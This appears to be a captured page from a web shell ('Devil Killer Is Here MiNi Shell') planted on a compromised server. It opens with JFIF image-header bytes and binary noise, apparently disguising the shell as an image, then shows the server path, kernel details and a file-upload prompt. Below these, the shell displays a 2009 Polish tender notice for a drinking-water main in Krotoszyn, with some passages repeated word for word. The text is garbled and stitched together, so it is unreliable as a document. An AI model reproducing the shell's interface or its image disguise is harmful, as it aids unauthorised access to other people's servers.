JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090108/8243-N-2009.html

<p class="kh_header"><b>Krotoszyn: Budowa magistrali wodociągowej wody pitnej do ul. Gajowej w Krotoszynie</b><br>
<b>Numer ogłoszenia: 8243 - 2009; data zamieszczenia: 08.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Sp. z o.o. w Krotoszynie , ul. Rawicka 41, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254233 w. 20, faks 062 7228000.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgkim.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa magistrali wodociągowej wody pitnej do ul. Gajowej w Krotoszynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wybudowanie magistrali wodociągowej wody pitnej w drodze powiatowej nr 13 363 do ul. Gajowej w Krotoszynie z rur z PE ( pobocze drogi).
Zakres rzeczowy robót:
- rurociąg z rur PE100 SDR17 PN10 fi 355/21,1  -  3915 mb
- rurociąg z rur PE100 SDR17 PN10 fi 315/18,7  -    123 mb
- rurociąg z rur PE100 SDR17 PN10 fi 250/14,8  -      12 mb       
- rurociąg z rur PE100 SDR17 PN10 fi 110/6,6    -      24 mb
Razem:                                                          4074 mb 

- rura osłonowa stalowa fi 400 mm                                 -      10 mb
- zasuwa typu E fi 350 mm typu HAWLE lub równoważne    -      17 szt.
- zasuwa typu E fi 300 mm typu HAWLE lub równoważne    -       1 szt.
- zasuwa typu E fi 250 mm  typu HAWLE lub równoważne   -       1 szt.
- zasuwa typu E fi 200 mm  typu HAWLE lub równoważne   -       2 szt.
- zasuwa typu E fi 100 mm  typu HAWLE lub równoważne   -       5 szt.
- hydrant ppoż. Fi 100 mm   typu HAWLE lub równoważne  -        3 szt.
- zawór napowietrzająco - odpowietrzający fi 80 mm                                                        typu HAWLE lub równoważne                                         -       2 szt.
2. Całość robót należy wykonać zgodnie z projektem budowlanym stanowiącym załącznik nr B do siwz. oraz specyfikacją techniczną wykonania i odbioru robót stanowiącą załącznik nr C do siwz. Szczegółowy zakres prac określa przedmiar robót oraz kosztorys (ślepy) stanowiący załącznik nr 1 do siwz.
3. Dokonać odłączenia istniejącej magistrali w węźle nr 1 i nr 6.                                                       4. Wykonać włączenie nowo wybudowanej magistrali do istniejącego rurociągi fi 500 i fi 350.
5. Przerwa w dostawie wody pitnej dla miasta Krotoszyna w trakcie przełączania rurociągów nie może być dłuższa niż 6 godz.
6. Należy odkryć węzły nr 1 i nr 6 celem zinwentaryzowania i zabezpieczenia niezbędnych kształtek do sprawnego przełączenia rurociągów. 
7. W cenie oferty należy uwzględnić wszystkie koszty wykonania zadania.
8. Roboty związane z wykonaniem w/w zamówienia muszą być wykonane zgodnie z niniejszą specyfikacją. Roboty budowlane należy wykonać zgodnie z Ustawą - Prawo Budowlane (Dz.U. z 2006r., Nr 156, poz. 1118), sztuką budowlaną, przepisami branżowymi i wszelkimi niezbędnymi przepisami oraz zasadami współczesnej wiedzy technicznej,zapewniając bezpieczne i higieniczne warunki pracy,  stosują wyroby budowlane i urządzenia posiadające stosowne aprobaty techniczne.
9. Zamawiający na własny koszt może w trakcie wykonywania robót lub przed odbiorem końcowym przeprowadzić monitoring kamerą przemysłową, sprawdzający jakość wykonanych robót. 10. Zaoferowana przez Wykonawcę cena winna obejmować  wszystkie  koszty  związane  z realizacją   zadania   niezbędne do  jego  wykonania (m.in. wszelkich  robót przygotowawczych, zagospodarowania placu budowy, utrzymania zaplecza budowy,wszelkich  robót  porządkowych, w tym uporządkowania  terenu budowy  po  zakończeniu robót, zajęcie pasa drogowego i urządzeń obcych, planu organizacji ruchu, oznakowania, regulacji urządzeń obcych i ich napraw po ewentualnych uszkodzeniach, niezbędnych  prób i  badań  wymaganych  dla  prawidłowej  oceny  jakości robót i  potrzeb odbioru  końcowego  zadania,  atestów i  certyfikacji zastosowanych  materiałów  i urządzeń  wymaganych  przez  przepisy, zabezpieczenia terenu budowy, wykonania inwentaryzacji geodezyjnej powykonawczej, dokumentów odbiorowych itp.).   
11. Zamawiający zastrzega, że całość lub część zamówienia nie może być powierzona              podwykonawcom.
12. Przebudowa przedmiotowej magistrali związana jest z równoczesną przebudową                drogi Krotoszyn - Chachalnia i wycinką drzew kolidujących z przebudową drogą i              magistralą wodociągową. Roboty związane z budową magistrali należy              zsynchronizować z przebudową drogi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8, 45.11.00.00-1, 45.20.00.00-9, 45.23.13.00-8, 45.23.21.00-3, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagana kwota wadium: 40.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 1) spełniają warunki określone w art. 22 ust. 1 oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych; 2) posiadają odpowiednie uprawnienia oraz nie podlegają wykluczeniu na podstawie art. 24 ust. Pzp a) posiadają uprawnienia do występowania w obrocie prawnym; b) wpłacą wadium, c) Nie zalegają z uiszczaniem podatków - Zaświadczenie z właściwego Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał on przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert), d) nie zalegają z uiszczaniem składek na ubezpieczenie społeczne lub zdrowotne -Zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Sołecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacania składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał on przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty płatności, lub wstrzymanie w całości wykonania decyzji organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),e) nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt. 4-8 ustawy Pzp.- Aktualna informacja z Krajowego Rejestru Karnego o niekaralności członków kierownictwa firmy albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), f) nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt.9 ustawy Pzp (jeżeli dotyczy) -Aktualna informacja z Krajowego Rejestru Karnego o niekaralności członków kierownictwa firmy albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).3)1  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj. przedstawią roboty budowlane zrealizowane w ciągu ostatnich pięciu latach przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącą przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz każdą robotę poprą referencjami lub innymi dokumentami potwierdzającymi należyte wykonanie robót budowlanych  - zawierająca nazwę i adres zleceniodawcy z numerem telefonu i faksu, nazwę roboty, termin realizacji, wartość roboty, zakres rzeczowy robót oraz potwierdzenie należytego wykonania robót. UWAGA:Należy wykazać minimum jedno zadanie polegające na wykonaniu sieci wodociągowej o wartości min. 1.000.000,00 zł brutto oraz 4 zadań polegających na wykonaniu sieci wodociągowej o łącznej wartości min. 1.000.000,00zł brutto. 3)2 Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń:a) koparka samojezdna o poj. łyżki > 0,25 m3 - 2 szt. b) Koparko-ładowarka o poj. łyżki min. > 0,1m3 1 szt. c) Samochód samowyładowczy >8 t. - 4 szt. d) Szalunek przestawny stalowy o wysokości min 1,5 m - 2 szt. e) Płyta wibracyjna typu lekkiego - 2 szt. f) Płyta wibracyjna typu ciężkiego - 1 szt. g) Stopa wibracyjna - 1 szt. h) Piła spalinowa do cięcia asfaltu i betonu - 1 szt. i) Młot pneumatyczny, hydrauliczny lub spalinowy - 1 szt. j) Zgrzewarka rur PE do 400 mm z wydrukiem parametrów zgrzewania - 1 szt. k) Agregat prądotwórczy - 2 szt. l) Niwelator - 2 szt. ł) Zespół igłofiltrów - 1 szt. m) Spycharka - 1 szt. 3)3 Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia: a) Kierownik budowy branży instalacyjnej - wykształcenie wyższe lub techniczne, minimum 5-cio letnie doświadczenie w kierowaniu robót instalacji zewnętrznych (do formularza należy załączyć:: odpis uprawnień kierownika budowy ( uprawnienia branży instalacyjnej zewnętrznej) oraz udokumentować jego przynależność do Okręgowej Izby Inżynierów Budownictwa. b) Kierownik robót drogowych lub majster: wykształcenie wyższe lub techniczne.Do formularza należy załączyć: dyplom ukończenia uczelni lub szkoły budownictwa ogólnego lub drogowego.
W przypadku udostępnienia osób, którymi będzie dysponował Wykonawca, należy załączyć pisemne zobowiązanie do ich udostępnienia. Pozostały personel przewidziany do realizacji robót:Operator koparki - 2 osoby, Kierowca samochodu - 4 osoby, Operator spycharki - 1 osoba, Operator narzędzi - 2 osoby, Monter sieci wodociągowej - 2 osoby, Robotnicy niewykwalifikowani - 2 osoby. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 1) spełniają warunki określone w art. 22 ust. 1 oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych; 2) posiadają odpowiednie uprawnienia oraz nie podlegają wykluczeniu na podstawie art. 24 ust. Pzp a) posiadają uprawnienia do występowania w obrocie prawnym; b) wpłacą wadium, c) Nie zalegają z uiszczaniem podatków - Zaświadczenie z właściwego Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał on przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert), d) nie zalegają z uiszczaniem składek na ubezpieczenie społeczne lub zdrowotne -Zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Sołecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacania składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał on przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty płatności, lub wstrzymanie w całości wykonania decyzji organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),e) nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt. 4-8 ustawy Pzp.- Aktualna informacja z Krajowego Rejestru Karnego o niekaralności członków kierownictwa firmy albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), f) nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt.9 ustawy Pzp (jeżeli dotyczy) -Aktualna informacja z Krajowego Rejestru Karnego o niekaralności członków kierownictwa firmy albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).3)1  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj. przedstawią roboty budowlane zrealizowane w ciągu ostatnich pięciu latach przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącą przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz każdą robotę poprą referencjami lub innymi dokumentami potwierdzającymi należyte wykonanie robót budowlanych  - zawierająca nazwę i adres zleceniodawcy z numerem telefonu i faksu, nazwę roboty, termin realizacji, wartość roboty, zakres rzeczowy robót oraz potwierdzenie należytego wykonania robót. UWAGA:Należy wykazać minimum jedno zadanie polegające na wykonaniu sieci wodociągowej o wartości min. 1.000.000,00 zł brutto oraz 4 zadań polegających na wykonaniu sieci wodociągowej o łącznej wartości min. 1.000.000,00zł brutto. 3)2 Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń:a) koparka samojezdna o poj. łyżki > 0,25 m3 - 2 szt. b) Koparko-ładowarka o poj. łyżki min. > 0,1m3 1 szt. c) Samochód samowyładowczy >8 t. - 4 szt. d) Szalunek przestawny stalowy o wysokości min 1,5 m - 2 szt. e) Płyta wibracyjna typu lekkiego - 2 szt. f) Płyta wibracyjna typu ciężkiego - 1 szt. g) Stopa wibracyjna - 1 szt. h) Piła spalinowa do cięcia asfaltu i betonu - 1 szt. i) Młot pneumatyczny, hydrauliczny lub spalinowy - 1 szt. j) Zgrzewarka rur PE do 400 mm z wydrukiem parametrów zgrzewania - 1 szt. k) Agregat prądotwórczy - 2 szt. l) Niwelator - 2 szt. ł) Zespół igłofiltrów - 1 szt. m) Spycharka - 1 szt.W przypadku udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi będzie dysponował Wykonawca, należy załączyć pisemne zobowiązanie do ich udostępnienia. 3)3 Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia: a) Kierownik budowy branży instalacyjnej - wykształcenie wyższe lub techniczne, minimum 5-cio letnie doświadczenie w kierowaniu robót instalacji zewnętrznych (do formularza należy załączyć: odpis uprawnień kierownika budowy ( uprawnienia branży instalacyjnej zewnętrznej) oraz udokumentować jego przynależność do Okręgowej Izby Inżynierów Budownictwa. b) Kierownik robót drogowych lub majster: wykształcenie wyższe lub techniczne.Do formularza należy załączyć: dyplom ukończenia uczelni lub szkoły budownictwa ogólnego lub drogowego.
W przypadku udostępnienia osób, którymi będzie dysponował Wykonawca, należy załączyć pisemne zobowiązanie do ich udostępnienia.)4. Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. a)Potwierdzenie zobowiązań  i należności finansowych wykonawcy - Sprawozdanie finansowe, a jeżeli  podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu, a w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności za okres 2007 r., a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, b)Potwierdzenie wysokości posiadanych środków finansowych lub zdolności do zaciągnięcia kredytu w wysokości nie mniejszej niż 3/4 wartości netto złożonej oferty - Oświadczenie wykonawcy o tym, w którym banku posiada podstawowy (zasadniczy) rachunek bankowy wraz z podaniem numeru rachunku
Informacja banku lub spółdzielczej kasy oszczędnościowo-Kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy (wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert), c) Ubezpieczenie o odpowiedzialności cywilnej o sumie gwarancyjnej nie mniejszej niż 1/2 wartości złożonej oferty netto - Polisa, a w przypadku jej braku inny dokument lub dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 5. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy 6. Ocena spełnienia warunków udziału w postępowaniu  przez Wykonawcę będzie dokonywana w oparciu o kompletność i prawidłowość złożonych oświadczeń i dokumentów, jakich żąda Zamawiający i zostanie dokonana na podstawie treści tych dokumentów według metody: spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełniony formularz ofertowy. 2. Kosztorys ofertowy sporządzony na podstawie przedmiaru robót. 3. Oświadczenie, że wykonawca spełnia warunki zawarte w art. 22 ust. 1 i nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych. 4. Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). W przypadku, gdy oddzielnym zaświadczeniem potwierdza sie aktualność wpisu do ewidencji działalności gospodarczej, należy przedłożyć również kserokopię zaświadczenia o wpisie do ewidencji działalności gospodarczej. 5. Pełnomocnictwo do złożenia oferty w przypadku podmiotów występujących wspólnie - zgodnie z art. 23 ust. 2 ustawy pzp. W przypadku wyboru oferty konsorcjum jako najkorzystniejszej, Zamawiający żąda umowy konsorcjum - przed podpisaniem umowy na realizację zadania, będącej przedmiotem przetargu. 6. Dowód wpłaty wadium. 7. Zaświadczenie z właściwego Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał on przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) 8. Zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacania składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał on przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty płatności, lub wstrzymanie w całości wykonania decyzji organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert). 9. Aktualna informacja z Krajowego Rejestru Karnego o niekaralności członków kierownictwa firmy albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 10. Aktualna informacja z Krajowego Rejestru Karnego o niekaralności członków kierownictwa firmy albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), (jeżeli dotyczy). 11. Wykaz ważniejszych robót wykonanych w okresie ostatnich pięciu latach przed dniem wszczęcia postępowania o udzielenie zamówienia( jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) - odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia.12. Dokumenty potwierdzające, że roboty przedstawione w  wykazie robót budowlanych zostały wykonane należycie (referencje). 13. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje Wykonawca lub będzie dysponował Wykonawca.Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponował będzie Wykonawca. 14. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych do wykonania zamówienia, a także  zakresu wykonywanych przez nie czynności oraz dokumentami potwierdzającymi posiadanie odpowiednich uprawnień, wraz z dokumentami potwierdzającymi posiadanie odpowiednich uprawnień ( z udokumentowaniem doświadczenia oraz kwalifikacji kierownika budowy branży sanitarnej - sieci zewnętrzne oraz kierownika  robót  branży drogowej)
Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, którymi dysponował będzie Wykonawca. 15.Sprawozdanie finansowe, a jeżeli  podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu, a w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności za okres 2007 r., a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. 16. Oświadczenie wykonawcy o tym, w którym banku posiada podstawowy (zasadniczy) rachunek bankowy wraz z podaniem numeru rachunku
17. Informacja banku lub spółdzielczej kasy oszczędnościowo-Kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy (wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert). 18. Polisa, a w przypadku jej braku inny dokument lub dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 19. W przypadku, gdyby Wykonawcę reprezentował Pełnomocnik - należy załączyć pełnomocnictwo..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Warunki gwarancji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
